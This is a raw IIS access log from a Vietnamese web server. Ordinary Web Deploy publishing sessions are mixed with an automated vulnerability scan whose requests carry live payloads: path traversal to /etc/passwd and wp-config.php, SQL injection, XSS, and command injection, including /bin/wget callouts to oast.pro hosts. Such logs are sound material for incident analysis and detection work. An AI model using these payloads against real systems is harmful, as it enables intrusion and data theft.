2024-01-05 03:07:27 103.153.214.94 GET /sites/all/modules/avatar_uploader/lib/demo/view.php file=../../../../../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 12
2024-01-05 03:08:38 103.153.214.94 GET /device.rsp opt=user&amp;cmd=list 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 9
2024-01-05 03:08:52 103.153.214.94 GET /Admin - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 5
2024-01-05 03:10:03 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 - 119.82.130.75 - - 401 2 5 20
2024-01-05 03:10:03 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 20
2024-01-05 03:10:03 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 38
2024-01-05 03:10:03 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=173f97d9-9a25-4108-a6d0-00d0bdac1a9d;op=Sync - 200 0 0 382
2024-01-05 03:10:03 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 471
2024-01-05 03:10:03 103.153.214.94 HEAD /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 9
2024-01-05 03:10:47 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 MSDeployExe;sid=173f97d9-9a25-4108-a6d0-00d0bdac1a9d;op=Sync - 200 0 0 43054
2024-01-05 03:10:47 103.153.214.94 POST /msdeploy.axd Site=gdnn.gdtsolutions.vn 8172 jenkins 119.82.130.75 - - 200 0 0 43089
2024-01-05 03:11:04 103.153.214.94 GET / id=AsHrgh%25{128*128} 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 6
2024-01-05 03:11:52 103.153.214.94 POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 8
2024-01-05 03:12:26 103.153.214.94 GET /google.com/evil.html - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 9
2024-01-05 03:13:19 103.153.214.94 GET /http:/www.interact.sh - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 400 0 0 12
2024-01-05 03:13:50 103.153.214.94 POST /timesheet/login.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 7
2024-01-05 03:14:51 103.153.214.94 GET /modules/babel/redirect.php newurl=http://interact.sh 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 11
2024-01-05 03:15:29 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 10
2024-01-05 03:16:52 103.153.214.94 GET /api/filemanager path=%2F..%2f..%2fContent 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 8
2024-01-05 03:16:54 103.153.214.94 GET /plugin/build-metrics/getBuildStats label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&amp;range=2&amp;rangeUnits=Weeks&amp;jobFilteringType=ALL&amp;jobFilter&amp;nodeFilteringType=ALL&amp;nodeFilter&amp;launcherFilteringType=ALL&amp;launcherFilter&amp;causeFilteringType=ALL&amp;causeFilter&amp;Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&amp;json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&amp;Submit=Search 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 5
2024-01-05 03:17:00 103.153.214.94 GET / rest_route=/wpgmza/v1/markers&amp;filter=%7b%7d&amp;fields=%2a%20from%20wp_users--%20- 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 6
2024-01-05 03:17:18 103.153.214.94 GET /printenv.shtml %3Cscript%3Ealert%281117255345%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 10
2024-01-05 03:17:21 103.153.214.94 GET /ssi/printenv.shtml %3Cscript%3Ealert%281117255345%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 5
2024-01-05 03:17:32 103.153.214.94 POST /checkValid - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 6
2024-01-05 03:21:53 103.153.214.94 GET /whoAmI/ - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 8
2024-01-05 03:21:56 103.153.214.94 GET /whoAmI/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 5
2024-01-05 03:22:34 103.153.214.94 GET /glpi/scripts/unlock_tasks.php cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&amp;only_tasks=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 15
2024-01-05 03:22:38 103.153.214.94 GET /scripts/unlock_tasks.php cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&amp;only_tasks=1 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 6
2024-01-05 03:23:30 103.153.214.94 GET /secure/ContactAdministrators!default.jspa - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 10
2024-01-05 03:24:27 103.153.214.94 GET /LetsEncrypt/Index fileName=/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 16
2024-01-05 03:24:30 103.153.214.94 GET /debug/pprof/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 5
2024-01-05 03:24:33 103.153.214.94 GET /debug/pprof/goroutine debug=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 6
2024-01-05 03:24:49 103.153.214.94 GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 10
2024-01-05 03:26:39 103.153.214.94 GET /log type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 10
2024-01-05 03:27:14 103.153.214.94 GET /free_time_failed.cgi err_msg=&lt;script&gt;alert(document.domain);&lt;/script&gt; 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 7
2024-01-05 03:27:26 103.153.214.94 POST /config/pw_snmp_done.html - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 6
2024-01-05 03:27:29 103.153.214.94 GET /config/pw_snmp.html - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 9
2024-01-05 03:27:32 103.153.214.94 GET /free_time.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 5
2024-01-05 03:28:23 103.153.214.94 GET /phpmyadmin/ - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 12
2024-01-05 03:28:42 103.153.214.94 GET /cgi-bin/kerbynet Action=StartSessionSubmit&amp;User=&#039;%0acat%20/etc/passwd%0a&#039;&amp;PW 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 7
2024-01-05 03:28:57 103.153.214.94 GET /mobile/index.php - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 6
2024-01-05 03:29:26 103.153.214.94 POST /crowd/admin/uploadplugin.action - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 19
2024-01-05 03:29:29 103.153.214.94 GET /crowd/plugins/servlet/exp - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 10
2024-01-05 03:30:38 103.153.214.94 POST /wp-admin/options-general.php page=yuzo-related-post 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 16
2024-01-05 03:30:41 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 7
2024-01-05 03:31:26 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 37
2024-01-05 03:31:26 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 38
2024-01-05 03:31:26 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 VS17.0:PublishDialog:WTE17.5.318.41597;sid=85dba165-d2ed-468b-9aea-20a2a8727475;op=Sync - 200 0 0 456
2024-01-05 03:31:26 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 576
2024-01-05 03:32:32 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 41
2024-01-05 03:32:32 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 40
2024-01-05 03:32:33 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 VS17.0:PublishDialog:WTE17.5.318.41597;sid=ba02f0c4-3ca8-41b2-9621-5209dcdf4729;op=Sync - 200 0 0 1313
2024-01-05 03:32:33 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 1498
2024-01-05 03:32:33 103.153.214.94 HEAD /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 70
2024-01-05 03:32:37 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 VS17.0:PublishDialog:WTE17.5.318.41597;sid=ba02f0c4-3ca8-41b2-9621-5209dcdf4729;op=Sync - 200 0 0 3633
2024-01-05 03:32:37 103.153.214.94 GET /wan.htm - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 4
2024-01-05 03:32:37 103.153.214.94 POST /msdeploy.axd site=gdnn.gdtsolutions.vn 8172 gdnn 171.231.146.64 - - 200 0 0 3868
2024-01-05 03:34:02 103.153.214.94 GET /webmail/calendar/minimizer/index.php style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 14
2024-01-05 03:34:05 103.153.214.94 GET /webmail/calendar/minimizer/index.php style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 5
2024-01-05 03:36:20 103.153.214.94 POST /NateMail.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 9
2024-01-05 03:36:22 103.153.214.94 GET /login - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 7
2024-01-05 03:36:25 103.153.214.94 POST /Collector/diagnostics/ping - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 7
2024-01-05 03:38:30 103.153.214.94 GET /WidgetHandler.ashx MethodName=Sort&amp;ID=1&amp;row=1&amp;column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 9
2024-01-05 03:38:32 103.153.214.94 GET /login - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 14
2024-01-05 03:38:35 103.153.214.94 POST /Collector/diagnostics/trace_route - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 8
2024-01-05 03:39:24 103.153.214.94 GET /wp-content/plugins/adaptive-images/adaptive-images-script.php adaptive-images-settings[source_file]=../../../wp-config.php 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 8
2024-01-05 03:39:40 103.153.214.94 POST /share/page/dologin - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 8
2024-01-05 03:41:26 103.153.214.94 GET /login - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 17
2024-01-05 03:41:41 103.153.214.94 GET /tools/sourceViewer/index.html filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 8
2024-01-05 03:42:24 103.153.214.94 GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php error&amp;error_description=%3Csvg/onload=alert(1)%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 11
2024-01-05 03:45:13 103.153.214.94 GET /mobile/error-not-supported-platform.html desktop_url=javascript:alert(1337);//itms:// 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 13
2024-01-05 03:45:28 103.153.214.94 GET /login - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 6
2024-01-05 03:45:31 103.153.214.94 POST /Collector/appliancesettings/applianceSettingsFileTransfer - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 6
2024-01-05 03:45:34 103.153.214.94 GET /talari/app/files/2aVH1Dm0r0MfXlU9kjtjHDqHnrF - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 7
2024-01-05 03:46:21 103.153.214.94 POST /password_change.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 16
2024-01-05 03:47:36 103.153.214.94 GET /WealthT24/GetImage docDownloadPath=/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 10
2024-01-05 03:47:39 103.153.214.94 GET /WealthT24/GetImage docDownloadPath=c:/windows/win.ini 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 6
2024-01-05 03:47:41 103.153.214.94 GET /scripts/wa.exe OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 5
2024-01-05 03:51:04 103.153.214.94 GET / rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 8
2024-01-05 03:53:42 103.153.214.94 GET /wp-content/plugins/insert-php/readme.txt - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 12
2024-01-05 03:53:59 103.153.214.94 GET /password.jsn - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 5
2024-01-05 03:54:23 103.153.214.94 GET /wpdmpro/list-packages/ orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&amp;order=asc 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 6
2024-01-05 03:54:43 103.153.214.94 GET /cgi-bin/login_mgr.cgi C1=ON&amp;cmd=login&amp;f_type=1&amp;f_username=admin&amp;port=80%7Cpwd%26id&amp;pre_pwd=1&amp;pwd=%20&amp;ssl=1&amp;ssl_port=1&amp;username 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 7
2024-01-05 03:54:43 103.153.214.94 GET /base_import/static/c:/windows/win.ini - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 400 0 0 12
2024-01-05 03:54:46 103.153.214.94 GET /web/static/c:/windows/win.ini - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 400 0 0 17
2024-01-05 03:54:50 103.153.214.94 GET /base/static/c:/windows/win.ini - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 400 0 0 34
2024-01-05 03:54:53 103.153.214.94 GET /Collector/storagemgmt/apply data%5B0%5D%5Bhost%5D=%60/bin/wget+http://cmbglsthtacjkv124nvgan8m3zudqijot.oast.pro%60&amp;data%5B0%5D%5Bpath%5D=mypath&amp;data%5B0%5D%5Btype%5D=mytype 8172 - 203.205.9.60 - - 404 7 0 9
2024-01-05 03:54:54 103.153.214.94 POST /api/users - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 7
2024-01-05 03:54:57 103.153.214.94 GET /catalog.php filename=../../../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 6
2024-01-05 03:55:08 103.153.214.94 GET /Collector/nms/addModifyZTDProxy ztd_server=127.0.0.1&amp;ztd_port=3333&amp;ztd_username=user&amp;ztd_password=$(/bin/wget$IFShttp://cmbglsthtacjkv124nvgjzyntgaucha96.oast.pro) 8172 - 203.205.9.60 - - 404 7 0 7
2024-01-05 03:56:53 103.153.214.94 GET /action/usermanager.htm - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 20
2024-01-05 03:57:39 103.153.214.94 GET /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 11
2024-01-05 03:57:41 103.153.214.94 GET /wp-content/plugins/checklist/images/checklist-icon.php fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 6
2024-01-05 04:00:30 103.153.214.94 GET /cgi-bin/config.exp - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 14
2024-01-05 04:00:40 103.153.214.94 GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 9
2024-01-05 04:01:47 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 25
2024-01-05 04:02:21 103.153.214.94 POST /wp-json/visualizer/v1/update-chart - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 9
2024-01-05 04:02:29 103.153.214.94 POST /wp-json/visualizer/v1/upload-data - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 5
2024-01-05 04:03:10 103.153.214.94 GET /admin/ n=product&amp;c=product_admin&amp;a=dopara&amp;app_type=shop&amp;id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 10
2024-01-05 04:04:10 103.153.214.94 POST /admin/ n=language&amp;c=language_general&amp;a=doExportPack 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 7
